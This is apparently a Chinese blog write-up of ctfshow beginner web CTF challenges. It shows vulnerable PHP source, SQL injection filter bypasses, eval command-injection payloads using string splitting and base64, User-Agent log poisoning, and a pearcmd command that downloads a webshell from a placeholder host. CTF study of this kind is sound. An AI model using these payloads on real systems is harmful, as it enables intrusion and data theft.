<!DOCTYPE html>


<html lang="en">


<head>
  <meta name="baidu-site-verification" content="code-3rVA1ADdSj" />
  <meta name="google-site-verification" content="Q0OkO0z4Tyc3lTN8vDrqENch_A9Fw2-fhFkeFiffDMw" />
  <meta charset="utf-8" />
   
  <meta name="keywords" content="Hexo,ayer,代码,博客" />
   
  <meta name="description" content="welcome to Sung&#39;s Blog" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    CTFshow萌新区web题 |  Sung&#39;s Blog
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">
  
<link rel="stylesheet" href="/css/custom.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  
<script>
var _hmt = _hmt || [];
(function() {
	var hm = document.createElement("script");
	hm.src = "https://hm.baidu.com/hm.js?80b2f48cd548787f831c320e7eb27d4c";
	var s = document.getElementsByTagName("script")[0]; 
	s.parentNode.insertBefore(hm, s);
})();
</script>


<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><link rel="alternate" href="/atom.xml" title="Sung's Blog" type="application/atom+xml">
</head>
</html>
</html>

<body>
  <div id="app">
    
      <canvas class="fireworks"></canvas>
      <style>
        .fireworks {
          position: fixed;
          left: 0;
          top: 0;
          z-index: 99999;
          pointer-events: none;
        }
      </style>
      
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-CTFshow萌新区web题"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  CTFshow萌新区web题
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/07/17/CTFshow%E8%90%8C%E6%96%B0%E5%8C%BAweb%E9%A2%98/" class="article-date">
  <time datetime="2021-07-16T16:00:00.000Z" itemprop="datePublished">2021-07-17</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/Web/">Web</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">1.6k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">7 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="CTFshow萌新区web题"><a href="#CTFshow萌新区web题" class="headerlink" title="CTFshow萌新区web题"></a>CTFshow萌新区web题</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>放暑假了，无聊，而且有点焦虑，要找工作或者考研了。</p>
<p>再次试着做做CTF题目，学习或者缓解焦虑。</p>
<p>靶场是<a target="_blank" rel="noopener" href="https://ctf.show/">ctfshow</a>，主要是人多也有q群，不会可以去问问别人。</p>
<h2 id="7-17-星期六"><a href="#7-17-星期六" class="headerlink" title="7.17 星期六"></a>7.17 星期六</h2><p>萌新区的密码学、杂项全部空过，不想动脑子</p>
<p>Web 1-8是一个系列故事，前7个都是要从article表中得到id字段=1000的那个记录，最后一个是删库跑路<code>rm -rf /*</code></p>
<p>前七个都是GET方法的sql注入，然后增加了一些过滤</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;title&gt;web7&lt;/title&gt;</span><br><span class="line">    &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;?php</span><br><span class="line"># 包含数据库连接文件</span><br><span class="line">include(&quot;config.php&quot;);</span><br><span class="line"># 判断get提交的参数id是否存在</span><br><span class="line">if(isset($_GET[&#x27;id&#x27;]))&#123;</span><br><span class="line">        $id = $_GET[&#x27;id&#x27;];</span><br><span class="line">    if(preg_match(&quot;/\&#x27;|\&quot;|or|\||\-|\\\|\/|\\*|\&lt;|\&gt;|\^|\!|\~|x|hex|\(|\)|\+|select/i&quot;,$id))&#123;</span><br><span class="line">            die(&quot;id error&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    # 判断id的值是否大于999</span><br><span class="line">    if(intval($id) &gt; 999)&#123;</span><br><span class="line">        # id 大于 999 直接退出并返回错误</span><br><span class="line">        die(&quot;id error&quot;);</span><br><span class="line">    &#125;else&#123;</span><br><span class="line">        # id 小于 999 拼接sql语句</span><br><span class="line">        $sql = &quot;select * from article where id = $id order by id limit 1 &quot;;</span><br><span class="line">        echo &quot;执行的sql为：$sql&lt;br&gt;&quot;;</span><br><span class="line">        # 执行sql 语句</span><br><span class="line">        $result = $conn-&gt;query($sql);</span><br><span class="line">        # 判断有没有查询结果</span><br><span class="line">        if ($result-&gt;num_rows &gt; 0) &#123;</span><br><span class="line">            # 如果有结果，获取结果对象的值$row</span><br><span class="line">            while($row = $result-&gt;fetch_assoc()) &#123;</span><br><span class="line">                echo &quot;id: &quot; . $row[&quot;id&quot;]. &quot; - title: &quot; . $row[&quot;title&quot;]. &quot; &lt;br&gt;&lt;hr&gt;&quot; . $row[&quot;content&quot;]. &quot;&lt;br&gt;&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        # 关闭数据库连接</span><br><span class="line">        $conn-&gt;close();</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;!-- flag in id = 1000 --&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>几个函数：</p>
<ol>
<li><code>isset</code>，检测变量是否已设置并且非 <code>NULL</code>，也就是是否GET方法传入参数</li>
<li><code>preg_match</code>，正则表达式匹配，如果出现则id error</li>
<li><code>intval</code>，返回一个字符串中非数字前的数字，如，<code>intval(&#39;1 or 1=1 #&#39;)</code>返回值是<code>1</code></li>
<li><code>$conn</code>，数据库连接，有一些成员函数，<code>query($sql)</code>执行sql语句、<code>fetch_assoc()</code>、<code>close()</code>等</li>
<li><code>highlight_file(__FILE__)</code>，显示当前文件内容</li>
</ol>
<p>解题思路：</p>
<ol>
<li><p>我们的目的是得到id=1000的记录的content，一共有两个需要解决的的地方：</p>
<ul>
<li><code>if(preg_match(&quot;/\&#39;|\&quot;|or|\||\-|\\\|\/|\\*|\&lt;|\&gt;|\^|\!|\~|x|hex|\(|\)|\+|select/i&quot;,$id))&#123;die(&quot;id error&quot;);</code>id不能出现这些（不区分大小写）字符<code>&#39; &quot; or | - \\ / * &lt; &gt; ^ ! ~ x hex ( ) + select </code></li>
<li><code>if(intval($id) &gt; 999)&#123;die(&quot;id error&quot;);</code>函数返回值不能大于999</li>
</ul>
</li>
<li><p>根据这些过滤，我们的有很多可能通过的<code>id</code>：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&#x27;1000&#x27;</span><br><span class="line">&quot;1000&quot;</span><br><span class="line">1 or 1=1 %23</span><br><span class="line">1 || 1=1 %23</span><br><span class="line">500/0.5</span><br><span class="line">2*500</span><br><span class="line">500&lt;&lt;1</span><br><span class="line">~~1000</span><br><span class="line">0x3e8</span><br><span class="line">hex(1000)</span><br><span class="line">1+999</span><br><span class="line">1 union select * from article where id=1000</span><br><span class="line">0b1111101000</span><br></pre></td></tr></table></figure></li>
</ol>
<h2 id="7-19-星期一"><a href="#7-19-星期一" class="headerlink" title="7.19 星期一"></a>7.19 星期一</h2><p><del>昨天和朋友去唱歌了，嗓子疼。</del></p>
<p>web 9是sql注入，执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"># flag in config.php</span><br><span class="line">include(&quot;config.php&quot;);</span><br><span class="line">if(isset($_GET[&#x27;c&#x27;]))&#123;</span><br><span class="line">        $c = $_GET[&#x27;c&#x27;];</span><br><span class="line">        if(preg_match(&quot;/system|exec|highlight/i&quot;,$c))&#123;</span><br><span class="line">                eval($c);</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">            die(&quot;cmd error&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">        highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>函数：</p>
<ol>
<li><code>eval()</code>函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码，且必须以分号结尾。</li>
<li><code>highlight_file()</code>函数，显示文件内容</li>
<li><code>exec($command,$array)</code>不输出结果，返回最后一行shell结果，所有结果可以保存到一个返回的数组里面。</li>
<li><code>system($command)</code> 输出并返回最后一行shell结果</li>
</ol>
<p>解题：</p>
<ol>
<li>需要包含这几个字符串，其实任何函数都可以执行。</li>
<li>选择<code>highlight_file(&#39;config.php&#39;);</code></li>
</ol>
<p>web 10类似，但是是不能出现那三个字符串</p>
<p>解题：</p>
<ol>
<li>可以将<code>system</code>拆分成<code>sys</code>和<code>tem</code>，然后再拼起来</li>
<li>payload：<code>?c=$a=&#39;sys&#39;;$b=&#39;tem&#39;;$d=$a.$b;$d(&#39;tac config.php&#39;);</code></li>
</ol>
<p>在网上搜答案搜到的一些方法，非常不错：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line">根据黑名单的不同，获取config.php的内容有以下几种方法:</span><br><span class="line"><span class="number">1</span>.命令执行函数</span><br><span class="line">system()、passthru()、exec()、shell_exec()、popen()、proc_open()、pcntl_exec()</span><br><span class="line">?c=passthru(<span class="string">&#x27;cat config.php&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="number">2</span>.构造</span><br><span class="line">?c=<span class="variable">$a</span>=<span class="string">&#x27;sys&#x27;</span>;<span class="variable">$b</span>=<span class="string">&#x27;tem&#x27;</span>;<span class="variable">$d</span>=<span class="variable">$a</span>.<span class="variable">$b</span>;<span class="variable">$d</span>(<span class="string">&#x27;cat config.php&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="number">3</span>.绕过cat命令</span><br><span class="line">?c=highlight_file(<span class="string">&#x27;config.php&#x27;</span>);</span><br><span class="line">?c=system(<span class="string">&#x27;ca&quot;&quot;t config.php&#x27;</span>);</span><br><span class="line">?c=system(<span class="string">&quot;ca&#x27;&#x27;t config.php&quot;</span>);</span><br><span class="line">?c=system(<span class="string">&#x27;ca\t config.php&#x27;</span>);</span><br><span class="line">linux有很多类似于cat的方法:tac、more、less、head、tail、nl、sed、sort、uniq</span><br><span class="line"></span><br><span class="line"><span class="number">4</span>.base64绕过</span><br><span class="line">?c=<span class="variable">$a</span>=base64_decode(<span class="string">&#x27;c3lzdGVt&#x27;</span>);<span class="variable">$b</span>=base64_decode(<span class="string">&#x27;Y2F0IGNvbmZpZy5waHA=&#x27;</span>);<span class="variable">$a</span>(<span class="variable">$b</span>);</span><br><span class="line"></span><br><span class="line"><span class="number">5</span>.绕过分号;</span><br><span class="line">?c=system(<span class="string">&#x27;cat config.php&#x27;</span>)<span class="meta">?&gt;</span></span><br><span class="line">?c=assert(base64_decode(<span class="string">&#x27;c3lzdGVtKCdjYXQgY29uZmlnLnBocCcp&#x27;</span>))<span class="meta">?&gt;</span> <span class="comment">//assert()会将字符串当做PHP代码来执行，并且字符串末尾可以没有分号</span></span><br><span class="line"></span><br><span class="line"><span class="number">6</span>.POST传值</span><br><span class="line">?c=<span class="keyword">echo</span> `<span class="variable">$_POST</span>[<span class="string">&quot;sung&quot;</span>]`; <span class="comment">// ``是为了执行命令</span></span><br><span class="line"><span class="comment">//然后再通过post传参sung=cat+config.php,具体是通过BUrpsuite抓包然后修改为POST，然后加Content-Type: application/x-www-form-urlencoded或者用浏览器插件hackerbar添加POST data。</span></span><br><span class="line"></span><br><span class="line">其他函数:</span><br><span class="line"><span class="comment">//打印该目录下所有文件名</span></span><br><span class="line">?c=var_dump(glob(<span class="string">&#x27;*&#x27;</span>)); <span class="comment">//信息更全面</span></span><br><span class="line">?c=print_r(glob(<span class="string">&#x27;*&#x27;</span>));</span><br><span class="line">?c=print_r(scandir(<span class="string">&#x27;.&#x27;</span>));</span><br><span class="line"><span class="comment">//下面两个同第二个，只是不带参数</span></span><br><span class="line">?c=print_r(scandir(pos(localeconv())));</span><br><span class="line">?c=print_r(scandir(current(localeconv())));</span><br></pre></td></tr></table></figure>

<p>payload：<code>?c=assert(base64_decode(%27aGlnaGxpZ2h0X2ZpbGUoJ2NvbmZpZy5waHAnKQ==%27))?&gt;</code></p>
<h2 id="7-23-星期五"><a href="#7-23-星期五" class="headerlink" title="7.23 星期五"></a>7.23 星期五</h2><p><del>首先是，犯下懒惰之罪的。。。</del></p>
<p>web 17是<code>nginx/1.16.1</code>服务器（404页面）</p>
<p><code>include($c)</code>：通过 include 或 require 语句，可以将 PHP 文件的内容插入另一个 PHP 文件（在服务器执行它之前）。</p>
<p>日志保存在<code>/var/log/nginx/access.log</code></p>
<p>思路：因为不让直接包含php执行代码，所以我们用<code>include</code>包含被保存的日志文件，日志文件会保存<code>User-Agent</code>，如果我们用<code>User-agent</code>头注入（通过<code>burpsuite</code>抓包），在日志文件里面注入<code>&lt;?php system(&#39;ls&#39;)?&gt;</code>，我们就可以绕过过滤<code>php</code>得到文件目录，任意命令都可以执行，我们看到有<code>index.php 36.php</code>两个，然后<code>hightlight_file(&#39;36d.php&#39;)</code>看到flag。</p>
<p><img src="/2021/07/17/CTFshow%E8%90%8C%E6%96%B0%E5%8C%BAweb%E9%A2%98/image-20210724111219258.png" alt="image-20210724111219258"></p>
<p><img src="/2021/07/17/CTFshow%E8%90%8C%E6%96%B0%E5%8C%BAweb%E9%A2%98/image-20210724111153369.png" alt="image-20210724111153369"></p>
<p>web18-21 都是相同的思路</p>
<h2 id="7-25-星期日"><a href="#7-25-星期日" class="headerlink" title="7.25 星期日"></a>7.25 星期日</h2><p>其实之后的都已经很难了，我基本上都是根据别人的wp做的，希望能够得到提高。</p>
<p>web 22 服务器上下载文件</p>
<p>payload：<code>pearcmd&amp;+download+http://xx.xx.xx.xx/1.php</code>一句话木马</p>
<p>快乐题，利用<code>&gt;</code>生成文件，<code>*</code>通配符命令在这里相当于<code>nl xx.php</code>，还有<code>nl</code>命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload：</span><br><span class="line">?1=&gt;nl</span><br><span class="line">?1=ls</span><br><span class="line">?1=*&gt;z        //*执行后的内容，写入z文件</span><br><span class="line">直接访问z文件，下载查看内容</span><br></pre></td></tr></table></figure>

<p>web 23、24上传文件，用python脚本提交。</p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>Copyright： </strong>
          
          Copyright is owned by the author. For commercial reprints, please contact the author for authorization. For non-commercial reprints, please indicate the source.
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://sun-ruijiang.github.io/2021/07/17/CTFshow%E8%90%8C%E6%96%B0%E5%8C%BAweb%E9%A2%98/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2021/08/01/CTFshow_WEB/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            CTFshow_WEB
          
        </div>
      </a>
    
    
      <a href="/2021/07/06/%E5%B0%8F%E5%AD%A6%E6%9C%9F/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">单片机相关知识</div>
      </a>
    
  </nav>

  
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2021
        <i class="ri-heart-fill heart_icon"></i> Sung
      </li>
    </ul>
    <!-- <ul>
      <li>
        
        
        
        powered_by
        <span class="division">|</span>
        Theme - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul> -->
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></s>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="Sung&#39;s Blog"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/friends">友链</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/about">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <script>
      if (window.matchMedia("(max-width: 768px)").matches) {
        document.querySelector('.content').classList.remove('on');
        document.querySelector('.sidebar').classList.remove('on');
      }
    </script>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->


<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: '.tocbot',
    contentSelector: '.article-entry',
    headingSelector: 'h1, h2, h3, h4, h5, h6',
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: 'main',
    positionFixedSelector: '.tocbot',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto'
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css">
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->

<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.6/unpacked/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
<script>
  var ayerConfig = {
    mathjax: true
  }
</script>

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script>

<script src="/js/clickBoom1.js"></script>


<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
